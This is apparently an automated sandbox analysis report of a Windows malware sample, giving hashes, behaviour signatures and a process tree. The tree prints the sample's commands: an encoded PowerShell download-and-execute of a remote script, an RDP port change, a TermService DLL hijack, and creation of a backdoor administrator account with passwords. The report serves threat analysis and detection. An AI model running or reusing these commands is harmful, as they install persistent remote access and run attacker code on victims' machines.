Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-11-2020 11:02
General
-
Target
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
-
Size
3.3MB
-
MD5
f2d37d864716da449a7791199ad3eb40
-
SHA1
c04d0b96e4492e1cba6a9604addc1d8f40e98be8
-
SHA256
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b
-
SHA512
a03ba66cd51e3d9ef9bbbe0f82e704ca1da13aa089dc3e03cc13900ba8f64e432949928de975d4c103ce977707a983ad1a318dc07f1e3a00d4c8daf3c1e69469
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Modifies data under HKEY_USERS 217 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 77 IoCs
-
Suspicious use of WriteProcessMemory 72 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7610.tmp" "c:\Users\Admin\AppData\Local\Temp\te0yl3oh\CSC527D92C168E4A1DAD338944CE31F98.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kuYvKJrw /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc kuYvKJrw /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kuYvKJrw /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kuYvKJrw1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc kuYvKJrw2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kuYvKJrw3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7610.tmpMD5
e39694504347d92921c0f151f7cb60fd
SHA127b54cb0b4d860cc82d30a04548998a067d1a67f
SHA256ab2a7187619f89cc0be45d16fdf55806b415c9ea44bf7094fd05d67f4d88f206
SHA5127f9f7fb7e19c1c864854f9a8320385d63de45addefe333f2e36a62b825e0cacdc4c9f18cdb2d27225f125b121dcdfbad4fa0aae1462944f21e0992bb6ec319f5
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.dllMD5
33e7541dc0edf88a1fe73fac8a57513c
SHA12fe94b19917fddfe97ea320db0dbb3f48ebf87f7
SHA25679f503b57b337362cb9602d503afd5e22d28092bcfdd06234e91f6d2219b8818
SHA51238a20beca2d6c6b2b9df2fe7f3bb63a12434aac400fce3f419cf3e35f2dc7daf79df0f1f5218b332a2b8a36383e2f0ad631c913e030c05471708cc68d63b61e5
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\te0yl3oh\CSC527D92C168E4A1DAD338944CE31F98.TMPMD5
7f6f33a4e8c61faa84841eb5ea91684a
SHA1665cf59a5d168c1abfa507f87daffd18ebffc6ea
SHA25639e4ba4b830af9d5c4c18bab2c3143a11a011beb8e5584fe22f65e293438e954
SHA51218e471739dfedc66c75de08762d8c2ed4f1578e04e23d770db7ba162a7a6b334dc503b4eb1a6a139bce61f81a268255c37f2d808f3a6f460e4e8c35478f9f188
-
\??\c:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.cmdlineMD5
d6ee414daaed0742426b787264ebca78
SHA1d4bf91e74de4bea2f67cd3aabc7da66da7328a3c
SHA25635fc60b270395829c492963a32e7885a7f30c23d2d2adb4465bbc9cf2ac5f8c6
SHA51257abd26919ad73ca9c2d1096fc4e987ec1ab76c75b380cb834d1fd72d1057b8fb72f26596dd1058b9fe0bba2019a4d06e9ee50e40191bc5e64b71879966cb701
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/200-19-0x0000000000000000-mapping.dmp
-
memory/204-20-0x0000000000000000-mapping.dmp
-
memory/212-42-0x0000000000000000-mapping.dmp
-
memory/508-27-0x0000000000000000-mapping.dmp
-
memory/560-51-0x0000000000000000-mapping.dmp
-
memory/696-34-0x0000000000000000-mapping.dmp
-
memory/696-18-0x0000000000000000-mapping.dmp
-
memory/752-26-0x0000000000000000-mapping.dmp
-
memory/756-53-0x0000000000000000-mapping.dmp
-
memory/904-37-0x0000000000000000-mapping.dmp
-
memory/1444-25-0x0000000000000000-mapping.dmp
-
memory/1544-33-0x0000000000000000-mapping.dmp
-
memory/1720-15-0x0000000000000000-mapping.dmp
-
memory/2100-30-0x0000000000000000-mapping.dmp
-
memory/2176-16-0x0000000000000000-mapping.dmp
-
memory/2188-32-0x0000000000000000-mapping.dmp
-
memory/2192-43-0x0000000000000000-mapping.dmp
-
memory/2212-45-0x0000000000000000-mapping.dmp
-
memory/2268-39-0x0000000000000000-mapping.dmp
-
memory/2348-22-0x0000000000000000-mapping.dmp
-
memory/2484-17-0x0000000000000000-mapping.dmp
-
memory/2576-21-0x0000000000000000-mapping.dmp
-
memory/2644-54-0x0000000000000000-mapping.dmp
-
memory/2712-41-0x0000000000000000-mapping.dmp
-
memory/2992-40-0x0000000000000000-mapping.dmp
-
memory/3024-2-0x0000000000000000-mapping.dmp
-
memory/3024-3-0x00007FFFCE9A0000-0x00007FFFCF38C000-memory.dmpFilesize
9.9MB
-
memory/3024-14-0x000001D998010000-0x000001D998011000-memory.dmpFilesize
4KB
-
memory/3024-4-0x000001D9FD0B0000-0x000001D9FD0B1000-memory.dmpFilesize
4KB
-
memory/3024-5-0x000001D9FF350000-0x000001D9FF351000-memory.dmpFilesize
4KB
-
memory/3048-31-0x0000000000000000-mapping.dmp
-
memory/3076-35-0x0000000000000000-mapping.dmp
-
memory/3180-46-0x0000000000000000-mapping.dmp
-
memory/3180-47-0x00007FFFCE9A0000-0x00007FFFCF38C000-memory.dmpFilesize
9.9MB
-
memory/3548-24-0x0000000000000000-mapping.dmp
-
memory/3632-52-0x0000000000000000-mapping.dmp
-
memory/3648-23-0x0000000000000000-mapping.dmp
-
memory/3788-38-0x0000000000000000-mapping.dmp
-
memory/3996-44-0x0000000000000000-mapping.dmp
-
memory/4000-10-0x0000000000000000-mapping.dmp
-
memory/4068-7-0x0000000000000000-mapping.dmp
-
memory/4076-1-0x00000000029E0000-0x00000000029E1000-memory.dmpFilesize
4KB
